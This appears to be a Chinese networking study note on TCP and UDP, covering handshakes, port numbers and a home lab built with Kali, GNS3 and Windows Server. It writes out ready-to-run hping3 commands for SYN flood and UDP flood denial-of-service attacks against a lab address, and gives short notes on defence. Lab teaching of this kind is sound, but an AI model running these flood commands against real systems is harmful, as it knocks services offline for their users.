传输层协议 1.TCP 2.UDP

传输层协议

1.TCP

2.UDP

TCP协议

回顾内容

  1. 传输层功能:定义应用层协议数据报文的端口号,流量控制
  2. 对原始数据进行分段处理

传输层所提供服务

  • 传输连接服务
  • 数据传输服务:流量控制、差错控制、序列控制

一、传输层的TCP协议

1.面向连接的传输协议

  • 要求数据在传输以前必须建立连接,数据传输后,必须释放连接
  • 仅支持单播传输,在两个终端之间建立的点对点连接

2.UDP用户数据报协议

二、TCP报文字段

字段含义:TCP报文格式详解,图解超详细!

【计算机网络】TCP协议------1.报文格式详解_tcp报文-CSDN博客

1.建立三次握手
2.TCP释放连接的四次挥手
3.TCP半关闭状态
4.TCP半连接状态

会产生SYN flood,属于DoS的一种。

5.常见TCP端口号
  • 21 FTP
  • 22 SSH
  • 23 TELNET
  • 25 SMTP
  • 53 DNS
  • 80 HTTP
  • 110 POP3
  • 143 IMAP4
  • 443 HTTPS
  • 3306 MYSQL
  • 3389 RDP

三、实施SYN flood

实施:

  • 在kali上使用hping3工具

防御:

  • 使用TCP代理(防火墙),比如10G的带宽,需要很多个w
  • TCP源探测,防火墙开启该功能,下一代防火墙
1.GNS3中
  • 安装好GNS3之后,进行配置

python 复制代码
#进入路由器中
2.kali中

输入:进入vim

python 复制代码
#在kali中,将网段设置成VMnet1
vim /etc/...
#按下A键
#写入
auto eth0
iface eth0 inet static
address 192.168.1.50
netmask 255.255.255.0
gateway 192.168.1.254
#写完后按下esc键,:
:wq! #保存并退出

ifdown eth0 #关闭网口
ifup eth0 #打开网口
ifconfig #查看kali的IP地址
route -n #查看路由表
python 复制代码
#在Windows server 2016中,将网络设置为VMnet8
#W配置IP地址
#进入cmd
netsh interface ip set address "Ethernet0" static 192.168.2.100 255.255.255.0 192.168.2.254
ipconfig
python 复制代码
#在kali中实施攻击
hping -c 1000 -d 200 -S -w 64 -p 80 --flood --rand-source 192.168.2.100

四、Windows Server 2016搭建网站

  • 打开服务器管理器
  • 管理
  • 添加角色和功能
  • 下一步,下一步
  • 服务器选择:下一步
  • 勾选web服务器,添加功能,下一步
  • 一直下一步,直到安装

五、安装GNS3

超详细GNS3安装和使用教程,避免各种报错 - ghbuff - 博客园

【CCNP | 网络模拟器GNS系列】安装、配置和使用 GNS3_gns3的安装步骤及导入路由器镜像的过程-CSDN博客

UDP协议

UDP(用户数据报)协议,是传输层的另外一个协议

一、简单概念

1、特点

不需要建立连接,直接发送数据,不会去重新排序,不需要确认

2、报文字段
  • 源端口
  • 目标端口
  • UDP长度
  • UDP校验和
3、常见的UDP端口号
  • 53 DNS
  • 69 TFTP
  • 111 RPC
  • 123 NTP
  • 161 SNMP

二、实施UDP Flood攻击

配置路由器IP

在Windows中

netstat -anop udp

开启53号端口

在kali中实施攻击

hping3 -q -n --rand-source --udp -p 53 --flood 192.168.2.100 -d 10000

相关推荐
云飞云共享云桌面8 小时前
SolidWorks对电脑的硬件配置要求具体有哪些
java·服务器·前端·网络·数据库
塔子终结者9 小时前
网络安全A模块专项练习任务十解析
java·服务器·网络安全
2301_780789669 小时前
渗透测试与网络安全审计的关系
网络·数据库·安全·web安全·网络安全
Jayyih10 小时前
嵌入式系统学习Day30(udp)
网络协议·学习·udp
Pure031910 小时前
OSI七层模型与tcp/ip四层模型
服务器·网络·tcp/ip
王火火(DDoS CC防护)10 小时前
服务器IP暴露被攻击了怎么办?
服务器·网络安全·ddos攻击
耐达讯通信技术11 小时前
嘎嘎厉害!耐达讯自动化RS485转Profinet网关就是食品温控的“天选之子”
运维·服务器·网络·人工智能·网络协议·自动化·信息与通信
EndingCoder13 小时前
调试技巧:Chrome DevTools 与 Node.js Inspector
javascript·网络·electron·node.js·vim·chrome devtools
Craze_rd13 小时前
服务 HTTP 转 SRPC 技术方案
网络·网络协议·http·rpc·golang
魔道不误砍柴功13 小时前
Mac 能够连Wife,但是不能上网问题解决
网络·macos·php